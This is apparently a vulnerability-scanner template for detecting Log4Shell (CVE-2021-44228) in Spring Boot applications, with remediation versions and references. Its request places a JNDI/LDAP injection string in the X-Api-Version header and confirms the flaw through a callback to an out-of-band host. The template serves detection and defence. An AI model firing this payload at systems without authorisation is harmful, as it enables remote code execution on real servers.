id: springboot-log4j-rce

info:
  name: Spring Boot Log4j Remote Code Injection
  author: pdteam
  severity: critical
  remediation: Upgrade to Log4j 2.3.1 (for Java 6), 2.12.3 (for Java 7), or 2.17.0 (for Java 8 and later).
  reference:
    - https://logging.apache.org/log4j/2.x/security.html
    - https://www.lunasec.io/docs/blog/log4j-zero-day/
    - https://github.com/twseptian/Spring-Boot-Log4j-CVE-2021-44228-Docker-Lab

set:
  hostname: request.url.host
  reverse: newReverse()
  reverseURL: reverse.url.host
rules:
  r0:
    request:
      method: GET
      path: /
      headers:
        X-Api-Version: ${jndi:ldap://{{hostname}}.{{reverseURL}}}
    expression: reverse.wait(5)
expression: r0()